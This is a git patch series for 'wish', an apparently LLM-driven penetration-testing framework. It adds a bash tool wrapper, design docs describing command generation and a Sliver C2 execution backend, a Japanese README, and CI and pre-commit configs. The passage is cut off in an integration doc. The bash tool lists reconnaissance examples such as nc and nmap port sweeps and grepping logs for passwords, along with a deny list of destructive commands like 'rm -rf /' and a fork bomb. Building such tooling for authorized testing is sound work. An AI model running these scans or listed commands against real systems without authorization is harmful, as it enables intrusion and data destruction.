From 4532d127ced5b88c07bddda9bdf808fa7298a675 Mon Sep 17 00:00:00 2001
From: Sho Nakatani <lay.sakura@gmail.com>
Date: Fri, 30 May 2025 06:27:22 +0900
Subject: [PATCH 1/4] Test pre-commit hook

---
 wish-tools/src/wish_tools/tools/bash.py | 258 ++++++++++++++++++++++++
 1 file changed, 258 insertions(+)
 create mode 100644 wish-tools/src/wish_tools/tools/bash.py

diff --git a/wish-tools/src/wish_tools/tools/bash.py b/wish-tools/src/wish_tools/tools/bash.py
new file mode 100644
index 0000000..afd546e
--- /dev/null
+++ b/wish-tools/src/wish_tools/tools/bash.py
@@ -0,0 +1,258 @@
+"""
+Bash tool implementation for wish framework.
+
+This tool provides a wrapper around bash command execution,
+compatible with the existing wish-command-execution backend.
+"""
+
+import asyncio
+import subprocess
+import time
+from pathlib import Path
+from typing import Dict, Any, Optional
+
+from wish_tools.framework.base import (
+    BaseTool, ToolMetadata, ToolCapability, ToolContext, ToolResult, CommandInput
+)
+
+
+class BashTool(BaseTool):
+    """Bash shell command execution tool."""
+    
+    def _build_metadata(self) -> ToolMetadata:
+        return ToolMetadata(
+            name="bash",
+            version="1.0.0",
+            description="Fallback shell command execution when no specialized tool is available",
+            author="Wish Framework Team",
+            category="fallback",
+            capabilities=[
+                ToolCapability(
+                    name="execute",
+                    description="Execute any bash command (used when specialized tools are unavailable)",
+                    parameters={
+                        "command": "The bash command to execute",
+                        "timeout": "Timeout in seconds (optional, default: 300)",
+                        "category": "Command category hint (optional: network, file, process, system, web, text)"
+                    },
+                    examples=[
+                        "# Network enumeration fallback",
+                        "nc -zv 192.168.1.1 22-443",
+                        "ping -c 4 8.8.8.8",
+                        "# File operations fallback", 
+                        "find /etc -name '*.conf' -type f",
+                        "grep -r 'password' /var/log/",
+                        "# Process management fallback",
+                        "ps aux | grep nginx",
+                        "netstat -tulpn | grep :80",
+                        "# System information fallback",
+                        "uname -a && cat /etc/os-release",
+                        "df -h && free -h"
+                    ]
+                ),
+                ToolCapability(
+                    name="script",
+                    description="Execute custom bash scripts for complex operations",
+                    parameters={
+                        "script": "The bash script content",
+                        "args": "Script arguments (optional)"
+                    },
+                    examples=[
+                        "#!/bin/bash\n# Custom enumeration script\nfor port in 22 80 443; do nc -zv $1 $port; done",
+                        "#!/bin/bash\n# Log analysis script\ngrep 'ERROR' /var/log/*.log | tail -20"
+                    ]
+                ),
+                ToolCapability(
+                    name="tool_combination",
+                    description="Combine multiple tools with pipes and logic when no single specialized tool exists",
+                    parameters={
+                        "command": "Complex command combining multiple tools",
+                        "description": "Description of what the combined command does"
+                    },
+                    examples=[
+                        "# Network discovery + service detection",
+                        "nmap -sn 192.168.1.0/24 | grep 'Nmap scan report' | awk '{print $5}' | xargs -I {} nmap -sV -p 22,80,443 {}",
+                        "# Log analysis with multiple filters",
+                        "cat /var/log/auth.log | grep 'Failed password' | awk '{print $11}' | sort | uniq -c | sort -nr"
+                    ]
+                )
+            ],
+            requirements=["bash"],
+            tags=["shell", "fallback", "general-purpose", "universal"]
+        )
+    
+    async def validate_availability(self) -> tuple[bool, Optional[str]]:
+        """Check if bash is available."""
+        try:
+            result = subprocess.run(
+                ["bash", "--version"],
+                capture_output=True,
+                text=True,
+                timeout=5
+            )
+            if result.returncode == 0:
+                return True, None
+            else:
+                return False, "Bash returned non-zero exit code"
+        except FileNotFoundError:
+            return False, "Bash not found in PATH"
+        except subprocess.TimeoutExpired:
+            return False, "Bash version check timed out"
+        except Exception as e:
+            return False, f"Error checking bash availability: {str(e)}"
+    
+    async def execute(
+        self,
+        command: CommandInput,
+        context: ToolContext,
+        **kwargs
+    ) -> ToolResult:
+        """Execute a bash command."""
+        start_time = time.time()
+        
+        try:
+            # Prepare environment
+            env = dict(context.environment_variables)
+            env.update(kwargs.get("env", {}))
+            
+            # Create working directory if it doesn't exist
+            work_dir = Path(context.working_directory)
+            work_dir.mkdir(parents=True, exist_ok=True)
+            
+            # Run bash command
+            process = await asyncio.create_subprocess_shell(
+                command.command,
+                stdout=asyncio.subprocess.PIPE,
+                stderr=asyncio.subprocess.PIPE,
+                cwd=context.working_directory,
+                env=env if env else None
+            )
+            
+            # Set up timeout
+            timeout = command.timeout_sec or context.timeout_override or 300
+            
+            try:
+                stdout, stderr = await asyncio.wait_for(
+                    process.communicate(),
+                    timeout=timeout
+                )
+            except asyncio.TimeoutError:
+                process.kill()
+                await process.wait()
+                return ToolResult(
+                    success=False,
+                    output="",
+                    error="Command timed out",
+                    exit_code=124,  # Standard timeout exit code
+                    execution_time=timeout,
+                    metadata={"timeout": True, "command": command.command}
+                )
+            
+            # Decode output
+            output = stdout.decode('utf-8', errors='replace') if stdout else ""
+            error = stderr.decode('utf-8', errors='replace') if stderr else ""
+            
+            execution_time = time.time() - start_time
+            
+            return ToolResult(
+                success=process.returncode == 0,
+                output=output,
+                error=error if error else None,
+                exit_code=process.returncode or 0,
+                execution_time=execution_time,
+                metadata={
+                    "command": command.command,
+                    "working_directory": context.working_directory,
+                    "run_id": context.run_id
+                }
+            )
+            
+        except Exception as e:
+            return ToolResult(
+                success=False,
+                output="",
+                error=f"Execution error: {str(e)}",
+                exit_code=-1,
+                execution_time=time.time() - start_time,
+                metadata={"command": command.command, "error_type": type(e).__name__}
+            )
+    
+    def generate_command(
+        self,
+        capability: str,
+        parameters: Dict[str, Any],
+        context: Optional[ToolContext] = None
+    ) -> CommandInput:
+        """Generate a bash command for the specified capability."""
+        if capability == "execute":
+            return CommandInput(
+                command=parameters["command"],
+                timeout_sec=parameters.get("timeout", 300)
+            )
+            
+        elif capability == "script":
+            # Create a temporary script file and execute it
+            script_content = parameters["script"]
+            args = parameters.get("args", "")
+            
+            # For now, use a simple inline approach
+            # In production, might want to write to a temp file
+            escaped_script = script_content.replace("'", "'\"'\"'")
+            command = f"bash -c '{escaped_script}'"
+            if args:
+                command += f" {args}"
+            
+            return CommandInput(
+                command=command,
+                timeout_sec=parameters.get("timeout", 300)
+            )
+            
+        elif capability == "file_ops":
+            operation = parameters["operation"]
+            
+            if operation == "read":
+                command = f"cat '{parameters['source']}'"
+            elif operation == "write":
+                content = parameters["content"]
+                target = parameters["target"]
+                # Escape content for shell
+                escaped_content = content.replace("'", "'\"'\"'")
+                command = f"echo '{escaped_content}' > '{target}'"
+            elif operation == "copy":
+                command = f"cp '{parameters['source']}' '{parameters['target']}'"
+            elif operation == "move":
+                command = f"mv '{parameters['source']}' '{parameters['target']}'"
+            else:
+                raise ValueError(f"Unknown file operation: {operation}")
+            
+            return CommandInput(
+                command=command,
+                timeout_sec=parameters.get("timeout", 60)
+            )
+            
+        else:
+            raise ValueError(f"Unknown capability: {capability}")
+    
+    def validate_command(self, command: CommandInput) -> tuple[bool, Optional[str]]:
+        """Validate bash command syntax and safety."""
+        cmd = command.command.strip()
+        
+        # Basic safety checks
+        dangerous_patterns = [
+            "rm -rf /",
+            ":(){ :|:& };:",  # Fork bomb
+            "dd if=/dev/zero",
+            "mkfs.",
+            "fdisk",
+            "parted"
+        ]
+        
+        for pattern in dangerous_patterns:
+            if pattern in cmd.lower():
+                return False, f"Command contains dangerous pattern: {pattern}"
+        
+        # Check for empty command
+        if not cmd:
+            return False, "Command cannot be empty"
+        
+        return True, None# Test change

From 1f53205f35fa06ae6541aaaf6e8d4a1c146697a8 Mon Sep 17 00:00:00 2001
From: Sho Nakatani <lay.sakura@gmail.com>
Date: Fri, 30 May 2025 06:38:39 +0900
Subject: [PATCH 2/4] feat: Implement wish tools framework with core components
 and tool registry

- Added `wish_tools` package with an extensible framework for penetration testing workflows.
- Created core framework components including `BaseTool`, `ToolContext`, `ToolMetadata`, and `ToolResult`.
- Implemented `ToolRegistry` for managing tool registration, discovery, and execution.
- Introduced testing utilities for validating tool implementations with `ToolTester`, `TestCase`, and various validators.
- Developed initial tool implementations including `BashTool` and `MsfconsoleTool`.
- Added comprehensive documentation and examples for tool usage and framework integration.
- Established a testing suite for framework functionality and tool integration tests.
---
 docs/design.md                                | 182 ++++++++
 wish-tools/.github/workflows/update-docs.yml  |  50 +++
 wish-tools/.pre-commit-config.yaml            |  19 +
 wish-tools/Makefile                           |  71 ++++
 wish-tools/README.md                          | 269 ++++++++++--
 .../docs/command-generator-integration.md     | 391 ++++++++++++++++++
 wish-tools/docs/tools/bash.md                 |  99 +++++
 wish-tools/docs/tools/index.md                |  87 ++++
 wish-tools/docs/tools/msfconsole.md           |  82 ++++
 wish-tools/pyproject.toml                     |   1 +
 wish-tools/scripts/generate_tool_docs.py      | 282 +++++++++++++
 wish-tools/scripts/test_tools.py              | 280 +++++++++++++
 wish-tools/scripts/tool_template.py           | 136 ++++++
 .../scripts/update_graph_visualization.py     |   5 +-
 wish-tools/src/wish_tools/__init__.py         |  41 ++
 .../src/wish_tools/framework/__init__.py      |  24 ++
 wish-tools/src/wish_tools/framework/base.py   | 187 +++++++++
 .../src/wish_tools/framework/registry.py      | 197 +++++++++
 .../src/wish_tools/framework/testing.py       | 276 +++++++++++++
 wish-tools/src/wish_tools/tool_step_trace.py  |  31 +-
 wish-tools/src/wish_tools/tools/__init__.py   |  60 +++
 wish-tools/src/wish_tools/tools/bash.py       | 144 +++----
 wish-tools/src/wish_tools/tools/msfconsole.py | 343 +++++++++++++++
 .../tests/integrated/test_tool_step_trace.py  |  26 +-
 wish-tools/tests/test_tools_framework.py      | 296 +++++++++++++
 wish-tools/tests/unit/test_tool_step_trace.py |  35 +-
 wish-tools/uv.lock                            |  86 ++++
 27 files changed, 3512 insertions(+), 188 deletions(-)
 create mode 100644 wish-tools/.github/workflows/update-docs.yml
 create mode 100644 wish-tools/.pre-commit-config.yaml
 create mode 100644 wish-tools/Makefile
 create mode 100644 wish-tools/docs/command-generator-integration.md
 create mode 100644 wish-tools/docs/tools/bash.md
 create mode 100644 wish-tools/docs/tools/index.md
 create mode 100644 wish-tools/docs/tools/msfconsole.md
 create mode 100644 wish-tools/scripts/generate_tool_docs.py
 create mode 100644 wish-tools/scripts/test_tools.py
 create mode 100644 wish-tools/scripts/tool_template.py
 create mode 100644 wish-tools/src/wish_tools/__init__.py
 create mode 100644 wish-tools/src/wish_tools/framework/__init__.py
 create mode 100644 wish-tools/src/wish_tools/framework/base.py
 create mode 100644 wish-tools/src/wish_tools/framework/registry.py
 create mode 100644 wish-tools/src/wish_tools/framework/testing.py
 create mode 100644 wish-tools/src/wish_tools/tools/__init__.py
 create mode 100644 wish-tools/src/wish_tools/tools/msfconsole.py
 create mode 100644 wish-tools/tests/test_tools_framework.py

diff --git a/docs/design.md b/docs/design.md
index 62a390a..557ed32 100644
--- a/docs/design.md
+++ b/docs/design.md
@@ -143,6 +143,111 @@ This separation allows each package to focus on its core functionality.
 7. Status updates are tracked and displayed in the TUI
 8. Results are stored in the wish history
 
+## Detailed Command Flow
+
+The following flowchart shows the complete end-to-end process from user input to command execution and analysis:
+
+```mermaid
+flowchart TB
+    %% User Interface Layer
+    subgraph TUI["🖥️ Terminal User Interface (wish-sh)"]
+        A[User launches wish shell] --> B[WishApp initializes]
+        B --> C[System Info Collection]
+        C --> D[WishInput Screen]
+        D --> E["User enters wish:<br/>'scan all ports on target'"]
+    end
+
+    %% Wish Management Layer
+    subgraph WM["📋 Wish Management"]
+        E --> F[WishManager.generate_commands]
+        F --> G[Create Wish object]
+        G --> H[CommandGenerator client]
+    end
+
+    %% Command Generation API Layer
+    subgraph API["🤖 Command Generation API"]
+        H --> I[API Request with context]
+        I --> J[LangGraph State Machine]
+        
+        subgraph Graph["Command Generation Graph"]
+            J --> K[feedback_analyzer]
+            K --> L{Route by feedback}
+            L -->|First execution| M[query_processor]
+            L -->|Timeout error| N[timeout_handler]
+            L -->|Network error| O[network_error_handler]
+            
+            M --> P[command_generator]
+            N --> Q[command_modifier]
+            O --> Q
+            P --> Q
+            Q --> R[result_formatter]
+        end
+        
+        subgraph LLM["LLM Processing"]
+            P --> S["ChatGPT/OpenAI<br/>with prompt template"]
+            S --> T["Generated command:<br/>'nmap -p1-1000 $TARGET_IP'<br/>'nmap -p1001-2000 $TARGET_IP'<br/>..."]
+        end
+    end
+
+    %% Command Suggestion Layer
+    subgraph CS["✅ Command Suggestion"]
+        R --> U[Return commands list]
+        U --> V[CommandSuggestion Screen]
+        V --> W["Display commands<br/>for user approval"]
+        W --> X{User decision}
+        X -->|Yes| Y[Proceed to execution]
+        X -->|No| D
+    end
+
+    %% Command Execution Layer
+    subgraph CE["⚡ Command Execution"]
+        Y --> Z[CommandExecutionScreen]
+        Z --> AA[CommandExecutor]
+        AA --> AB[Backend selection]
+        
+        AB --> AC{Backend type}
+        AC -->|Local| AD[BashBackend]
+        AC -->|Remote| AE[SliverBackend]
+        
+        AD --> AF[Execute via subprocess]
+        AE --> AG[Execute via C2]
+        
+        AF --> AH[Write stdout/stderr<br/>to log files]
+        AG --> AH
+    end
+
+    %% Monitoring Layer
+    subgraph MON["📊 Monitoring & Analysis"]
+        AH --> AI[CommandStatusTracker]
+        AI --> AJ[Monitor execution]
+        AJ --> AK{Command complete?}
+        AK -->|No| AJ
+        AK -->|Yes| AL[LogAnalysisClient]
+        AL --> AM[Analyze logs with LLM]
+        AM --> AN[Update command state]
+        AN --> AO[Update UI status]
+    end
+
+    %% Completion
+    AO --> AP{All commands done?}
+    AP -->|No| AJ
+    AP -->|Yes| AQ[Update Wish state]
+    AQ --> AR[Show completion message]
+    AR --> AS[Return to WishInput]
+    AS --> D
+
+    %% Styling
+    classDef userAction fill:#e1f5fe,stroke:#01579b,stroke-width:2px
+    classDef llmAction fill:#f3e5f5,stroke:#4a148c,stroke-width:2px
+    classDef systemAction fill:#e8f5e9,stroke:#1b5e20,stroke-width:2px
+    classDef decision fill:#fff3e0,stroke:#e65100,stroke-width:2px
+    
+    class E,W,X userAction
+    class S,AM llmAction
+    class F,G,H,I,J,K,M,N,O,P,Q,R,U,V,Y,Z,AA,AB,AD,AE,AF,AG,AH,AI,AJ,AL,AN,AO,AQ,AR systemAction
+    class L,X,AC,AK,AP decision
+```
+
 ## Command Result Processing Flow
 
 ```mermaid
@@ -164,3 +269,80 @@ sequenceDiagram
     LogAnalyzer-->>WishManager: CommandResult with log_summary and state
     WishManager-->>User: Display analyzed result
 ```
+
+## Key Components and Their Roles
+
+### 1. **wish-sh (TUI Interface)**
+- **Entry Point**: `wish.py` - Handles CLI arguments and initializes the TUI
+- **Main App**: `WishApp` in `wish_tui.py` - Manages the Textual-based interface
+- **Screens**:
+  - `WishInput`: Where users type their natural language wishes
+  - `CommandSuggestion`: Shows generated commands for approval
+  - `CommandExecutionScreen`: Displays real-time execution status
+
+### 2. **WishManager**
+- Central orchestrator in `wish_manager.py`
+- Coordinates between command generation, execution, and analysis
+- Manages wish lifecycle and persistence
+
+### 3. **Command Generation API**
+- **Client**: `CommandGenerationClient` sends requests to the API
+- **API Handler**: Lambda function processes requests
+- **LangGraph**: State machine with specialized nodes:
+  - `feedback_analyzer`: Handles retry logic for failed commands
+  - `query_processor`: Prepares the query for LLM
+  - `command_generator`: Uses OpenAI/ChatGPT with prompt templates
+  - `command_modifier`: Applies transformations (e.g., divide & conquer)
+  - `result_formatter`: Prepares the final command list
+
+### 4. **LLM Prompt Templates**
+The system uses sophisticated prompts that include:
+- **Context Information**: Current directory, command history
+- **Guidelines**: 
+  - Interactive command avoidance (e.g., `msfconsole -x "...exit -y"`)
+  - Fast alternatives (e.g., using `rg` instead of `grep`)
+  - Divide & conquer strategies (e.g., splitting port scans)
+
+### 5. **Command Execution**
+- **CommandExecutor**: Manages command lifecycle
+- **Backends**:
+  - `BashBackend`: Local execution via subprocess
+  - `SliverBackend`: Remote execution via C2 framework
+- **Logging**: All output captured to files for analysis
+
+### 6. **Monitoring & Analysis**
+- **CommandStatusTracker**: Polls for command completion
+- **LogAnalysisClient**: Uses LLM to analyze command output
+- **State Management**: Tracks success, failure, timeouts, etc.
+
+## Example Flow
+
+**User's Wish**: "scan all ports on the target machine"
+
+1. User types wish in TUI
+2. WishManager creates Wish object with unique ID
+3. CommandGenerator sends to API with system context
+4. LangGraph processes through nodes:
+   - Query processor enhances the query
+   - Command generator creates base command
+   - Command modifier applies divide & conquer (splits into 65 parallel nmap commands)
+5. User sees suggested commands and approves
+6. CommandExecutor runs all commands in parallel
+7. StatusTracker monitors progress
+8. LogAnalysisClient analyzes results
+9. UI updates with findings
+10. User returns to wish input for next task
+
+## Key Design Patterns
+
+1. **State Machine Pattern**: LangGraph for complex command generation logic
+2. **Strategy Pattern**: Multiple execution backends (Bash, Sliver)
+3. **Observer Pattern**: Real-time UI updates during execution
+4. **Chain of Responsibility**: Node-based processing in command generation
+
+## Integration Points
+
+- **LangSmith**: Tracing for LLM operations
+- **OpenAI API**: Command generation and log analysis
+- **Sliver C2**: Remote command execution
+- **File System**: Log storage and analysis
diff --git a/wish-tools/.github/workflows/update-docs.yml b/wish-tools/.github/workflows/update-docs.yml
new file mode 100644
index 0000000..86b0541
--- /dev/null
+++ b/wish-tools/.github/workflows/update-docs.yml
@@ -0,0 +1,50 @@
+name: Update Tool Documentation
+
+on:
+  push:
+    branches: [ main, master ]
+    paths:
+      - 'src/wish_tools/tools/**/*.py'
+      - 'src/wish_tools/framework/**/*.py'
+  pull_request:
+    branches: [ main, master ]
+    paths:
+      - 'src/wish_tools/tools/**/*.py'
+      - 'src/wish_tools/framework/**/*.py'
+
+jobs:
+  update-docs:
+    runs-on: ubuntu-latest
+    
+    steps:
+    - uses: actions/checkout@v4
+    
+    - name: Set up Python
+      uses: actions/setup-python@v4
+      with:
+        python-version: '3.11'
+        
+    - name: Install uv
+      run: |
+        curl -LsSf https://astral.sh/uv/install.sh | sh
+        echo "$HOME/.cargo/bin" >> $GITHUB_PATH
+    
+    - name: Install dependencies
+      run: uv sync
+      
+    - name: Generate tool documentation
+      run: uv run python scripts/generate_tool_docs.py
+      
+    - name: Run tool tests
+      run: uv run python scripts/test_tools.py
+      
+    - name: Check for documentation changes
+      run: |
+        if [ -n "$(git diff --name-only docs/)" ]; then
+          echo "Documentation changes detected:"
+          git diff --name-only docs/
+          echo "Please commit the updated documentation."
+          exit 1
+        else
+          echo "Documentation is up to date."
+        fi
\ No newline at end of file
diff --git a/wish-tools/.pre-commit-config.yaml b/wish-tools/.pre-commit-config.yaml
new file mode 100644
index 0000000..2cf1ced
--- /dev/null
+++ b/wish-tools/.pre-commit-config.yaml
@@ -0,0 +1,19 @@
+# Pre-commit hooks for wish-tools
+repos:
+  - repo: local
+    hooks:
+      - id: generate-tool-docs
+        name: Generate tool documentation
+        entry: uv run python scripts/generate_tool_docs.py
+        language: system
+        files: ^src/wish_tools/tools/.*\.py$
+        pass_filenames: false
+        always_run: false
+        
+      - id: run-tool-tests
+        name: Run tool tests
+        entry: uv run python scripts/test_tools.py
+        language: system
+        files: ^src/wish_tools/.*\.py$
+        pass_filenames: false
+        always_run: false
\ No newline at end of file
diff --git a/wish-tools/Makefile b/wish-tools/Makefile
new file mode 100644
index 0000000..7bca903
--- /dev/null
+++ b/wish-tools/Makefile
@@ -0,0 +1,71 @@
+# Makefile for wish-tools development
+
+.PHONY: help install test docs lint clean check-docs
+
+help: ## Show this help message
+	@echo "Available commands:"
+	@grep -E '^[a-zA-Z_-]+:.*?## .*$$' $(MAKEFILE_LIST) | sort | awk 'BEGIN {FS = ":.*?## "}; {printf "\033[36m%-20s\033[0m %s\n", $$1, $$2}'
+
+install: ## Install dependencies
+	uv sync
+
+test: ## Run all tests
+	uv run python -m pytest tests/
+	uv run python scripts/test_tools.py
+
+docs: ## Generate tool documentation
+	uv run python scripts/generate_tool_docs.py
+	@echo "Documentation generated in docs/tools/"
+
+check-docs: ## Check if documentation is up to date
+	@echo "Checking if documentation is up to date..."
+	@uv run python scripts/generate_tool_docs.py --output-dir docs/tools-temp
+	@if ! diff -r docs/tools docs/tools-temp > /dev/null 2>&1; then \
+		echo "❌ Documentation is out of date. Run 'make docs' to update."; \
+		rm -rf docs/tools-temp; \
+		exit 1; \
+	else \
+		echo "✅ Documentation is up to date."; \
+		rm -rf docs/tools-temp; \
+	fi
+
+lint: ## Run linting
+	uv run ruff check src/ tests/ scripts/
+	uv run ruff format --check src/ tests/ scripts/
+
+format: ## Format code
+	uv run ruff format src/ tests/ scripts/
+
+clean: ## Clean up temporary files
+	find . -type d -name "__pycache__" -exec rm -rf {} + 2>/dev/null || true
+	find . -type f -name "*.pyc" -delete 2>/dev/null || true
+	rm -rf .pytest_cache/
+	rm -rf docs/tools-temp/
+
+# Development workflow targets
+dev-setup: install ## Set up development environment
+	@echo "Installing pre-commit hooks..."
+	@uv run pre-commit install
+	@echo "✅ Pre-commit hooks installed"
+
+dev-check: lint test check-docs ## Run all development checks
+
+# Tool development workflow
+add-tool: ## Add a new tool (requires TOOL_NAME)
+	@if [ -z "$(TOOL_NAME)" ]; then \
+		echo "Usage: make add-tool TOOL_NAME=mytool"; \
+		exit 1; \
+	fi
+	@echo "Creating template for tool: $(TOOL_NAME)"
+	@cp scripts/tool_template.py src/wish_tools/tools/$(TOOL_NAME).py
+	@sed -i '' 's/TOOL_NAME/$(TOOL_NAME)/g' src/wish_tools/tools/$(TOOL_NAME).py
+	@echo "✅ Tool template created: src/wish_tools/tools/$(TOOL_NAME).py"
+	@echo "Next steps:"
+	@echo "1. Edit src/wish_tools/tools/$(TOOL_NAME).py"
+	@echo "2. Run 'make docs' to generate documentation"
+	@echo "3. Run 'make test' to verify implementation"
+
+release-check: ## Check if ready for release
+	@echo "🔍 Running release checks..."
+	@make dev-check
+	@echo "✅ All checks passed. Ready for release!"
\ No newline at end of file
diff --git a/wish-tools/README.md b/wish-tools/README.md
index 30c04bd..b5ca576 100644
--- a/wish-tools/README.md
+++ b/wish-tools/README.md
@@ -1,58 +1,267 @@
-# RapidPen Tools
+# Wish Tools Framework
 
-RapidPen Toolsモジュールは、RapidPenの各モジュールで使用される共通ツールを提供するモジュールです。
+Wish Toolsは、wish フレームワーク用の拡張可能なツール抽象化フレームワークです。ペネトレーションテストツールを統一的なインターフェースで使用できるようにし、LLM による自動的なツール選択とコマンド生成を可能にします。
 
-## 提供ツール
+## 特徴
 
-### Tool Step Trace
+- **統一インターフェース**: 異なるツールを共通のAPIで操作
+- **自動ツール発見**: 新しいツールの自動登録
+- **LLM統合**: ツールの機能をLLMが理解できる形で提供
+- **テスト機能**: 各ツールの動作確認とテスト
+- **ドキュメント生成**: ツールの使用方法を自動生成
+- **フォールバック機能**: 専用ツールがない場合のbashフォールバック
 
-Tool Step Traceは、RapidPen-visにステップトレースを追加するためのワークフローを提供します。このツールを使用することで、ワークフローの実行状況を可視化することができます。
+## インストールと使用方法
 
-#### 使用方法
+### 基本的な使用方法
 
 ```python
-from rapidpen_tools.tool_step_trace import main as step_trace_main
+from wish_tools.framework.registry import tool_registry
+from wish_tools.framework.base import ToolContext, CommandInput
 
-# StepTraceを呼び出し
-result = step_trace_main(
-    run_id="実行ID",
-    trace_name="トレース名",
-    trace_message="トレースメッセージ"
+# 利用可能なツールを一覧表示
+tools = tool_registry.list_tools()
+for tool in tools:
+    print(f"{tool.name}: {tool.description}")
+
+# ツールを取得して実行
+tool = tool_registry.get_tool('bash')
+context = ToolContext(
+    working_directory='/tmp',
+    run_id='example'
 )
+
+# コマンドを生成
+command = tool.generate_command(
+    capability='execute',
+    parameters={
+        'command': 'nmap -sS -p 22,80,443 192.168.1.0/24',
+        'category': 'network'
+    }
+)
+
+# コマンドを実行
+result = await tool.execute(command, context)
+print(f"Success: {result.success}")
+print(f"Output: {result.output}")
+```
+
+### ツール機能の検索
+
+```python
+# カテゴリ別にツールを検索
+exploit_tools = tool_registry.list_by_category('exploitation')
+fallback_tools = tool_registry.list_by_category('fallback')
+
+# タグで検索
+pentesting_tools = tool_registry.list_by_tag('pentesting')
+
+# キーワード検索
+search_results = tool_registry.search_tools('metasploit')
 ```
 
-#### パラメータ
+## 利用可能なツール
+
+### 専用ツール
+
+#### msfconsole (Exploitation)
+- **exploit**: エクスプロイト実行
+- **auxiliary**: 補助モジュール実行
+- **search**: モジュール検索
+- **info**: モジュール情報取得
+
+### フォールバックツール
+
+#### bash (Universal Fallback)
+- **execute**: 任意のシェルコマンド実行
+- **script**: カスタムスクリプト実行
+- **tool_combination**: 複数ツールの組み合わせ
 
-- `run_id`: 実行ID（Run-プレフィックスなし）
-- `trace_name`: トレース名
-- `trace_message`: トレースメッセージ
+専用ツールが利用できない場合の最後の手段として使用されます。
 
-#### 戻り値
+## ツールの追加
+
+新しいツールを追加するには、`BaseTool` を継承したクラスを作成します：
 
 ```python
-{
-    "status_code": 200,  # HTTPステータスコード
-    "body": "Success"    # レスポンスボディ
-}
+from wish_tools.framework.base import BaseTool, ToolMetadata, ToolCapability
+
+class MyTool(BaseTool):
+    def _build_metadata(self) -> ToolMetadata:
+        return ToolMetadata(
+            name="mytool",
+            version="1.0.0", 
+            description="My custom tool",
+            author="Me",
+            category="custom",
+            capabilities=[
+                ToolCapability(
+                    name="scan",
+                    description="Perform custom scanning",
+                    parameters={
+                        "target": "Target to scan",
+                        "options": "Scan options"
+                    },
+                    examples=["mytool -t 192.168.1.1 -v"]
+                )
+            ],
+            requirements=["mytool"],
+            tags=["custom", "scanning"]
+        )
+    
+    async def validate_availability(self):
+        # ツールの利用可能性をチェック
+        return True, None
+    
+    async def execute(self, command, context):
+        # ツールを実行
+        pass
+    
+    def generate_command(self, capability, parameters, context=None):
+        # LLM用のコマンド生成
+        pass
 ```
 
-### Base64 Encoder
+ツールは自動的に発見・登録されます。
+
+## テストとドキュメント生成
+
+### ツールのテスト実行
+
+```bash
+# 特定のツールをテスト
+uv run python scripts/test_tools.py --tool bash
+
+# 全ツールをテスト  
+uv run python scripts/test_tools.py
+
+# テストレポートを保存
+uv run python scripts/test_tools.py --save-reports
+```
+
+### ドキュメント生成
+
+```bash
+# ツールドキュメントを生成
+uv run python scripts/generate_tool_docs.py
+
+# 特定の種類のドキュメントのみ生成
+uv run python scripts/generate_tool_docs.py --index --matrix
+```
+
+## LLM統合
+
+このフレームワークは、LLMが適切なツールと機能を選択できるよう設計されています。
+
+### ツール選択の優先順位
+
+1. **専用ツール優先**: 可能な限り専用ツールを使用
+2. **bashフォールバック**: 専用ツールがない場合のみbashを使用
 
-Base64エンコーダーは、文字列をBase64形式にエンコードするためのツールを提供します。
+### LLM向けメタデータ
 
-#### 使用方法
+各ツールは以下の情報をLLMに提供します：
+
+- **機能(Capabilities)**: ツールができること
+- **パラメータ**: 各機能で必要な入力
+- **例**: 具体的な使用例
+- **要件**: システム要件
+
+## アーキテクチャ
+
+```
+wish-tools/
+├── framework/          # コアフレームワーク
+│   ├── base.py        # ツールインターフェース
+│   ├── registry.py    # ツール登録・管理
+│   └── testing.py     # テストフレームワーク
+├── tools/             # ツール実装
+│   ├── bash.py        # Bashツール（フォールバック）
+│   └── msfconsole.py  # Metasploitツール
+└── scripts/           # 開発支援スクリプト
+    ├── test_tools.py
+    └── generate_tool_docs.py
+```
+
+## レガシーツール（後方互換性）
+
+以下のレガシーツールは後方互換性のため残されています：
+
+### Tool Step Trace
 
 ```python
-from rapidpen_tools.to_base64 import main as to_base64
+from wish_tools.tool_step_trace import main as step_trace_main
+
+result = step_trace_main(
+    run_id="実行ID",
+    trace_name="トレース名", 
+    trace_message="トレースメッセージ"
+)
+```
+
+### Base64 Encoder
+
+```python  
+from wish_tools.to_base64 import main as to_base64
 
-# 文字列をBase64エンコード
 encoded = to_base64("Hello, World!")
 ```
 
-#### パラメータ
+これらは将来的に新しいフレームワークインターフェースに移行予定です。
+
+## 開発とコントリビューション
+
+### 開発環境セットアップ
+
+```bash
+# 開発環境のセットアップ
+make dev-setup
+
+# または手動で：
+uv sync                       # 依存関係のインストール
+uv run pre-commit install    # pre-commitフックのインストール
+```
+
+### 開発ワークフロー
+
+```bash
+# 新しいツールの追加
+make add-tool TOOL_NAME=mytool
+
+# ドキュメント生成
+make docs
 
-- `plain`: エンコードする文字列
+# テスト実行
+make test
+
+# 開発チェック（リント + テスト + ドキュメント確認）
+make dev-check
+
+# リリース前チェック
+make release-check
+```
+
+### 自動化された品質管理
+
+#### **Pre-commit Hooks**
+ツールファイルを変更時に自動実行：
+- ドキュメント生成
+- テスト実行
+
+#### **GitHub Actions**
+プルリクエスト時に自動チェック：
+- ドキュメントが最新か確認
+- すべてのテストをパス
+- コード品質チェック
+
+#### **Make タスク**
+```bash
+make help  # 利用可能なコマンドを表示
+```
 
-#### 戻り値
+### コントリビューションガイドライン
 
-Base64エンコードされた文字列
+1. 新しいツールを追加する場合は `BaseTool` を継承してください
+2. 適切なテストケースを作成してください
+3. ドキュメントが自動生成されることを確認してください
+4. 安全性チェック（`validate_command`）を実装してください
diff --git a/wish-tools/docs/command-generator-integration.md b/wish-tools/docs/command-generator-integration.md
new file mode 100644
index 0000000..6ac7eca
--- /dev/null
+++ b/wish-tools/docs/command-generator-integration.md
@@ -0,0 +1,391 @@
+# Command Generator Integration with Tool Framework
+
+This document outlines how to integrate the wish-tools framework with the existing Command Generator API to enable LLM-driven tool selection and command generation.
+
+## Overview
+
+The integration transforms the command generation flow from:
+```
+User Query → LLM → Shell Commands
+```
+
+To:
+```
+User Query → LLM → Tool Selection → Capability Selection → Parameter Extraction → Command Generation
+```
+
+## Tool Selection Strategy
+
+### 1. **Priority-Based Tool Selection**
+
+The LLM should select tools in this priority order:
+
+1. **Specialized Tools First**: Use dedicated tools when available
+2. **Bash as Fallback**: Use bash only when no specialized tool exists
+
+```python
+TOOL_PRIORITY = {
+    "network_scanning": ["bash"],  # Use bash for nmap commands
+    "exploitation": ["msfconsole", "bash"],
+    "web_requests": ["bash"],  # Use bash for curl/wget commands
+    "file_operations": ["bash"],
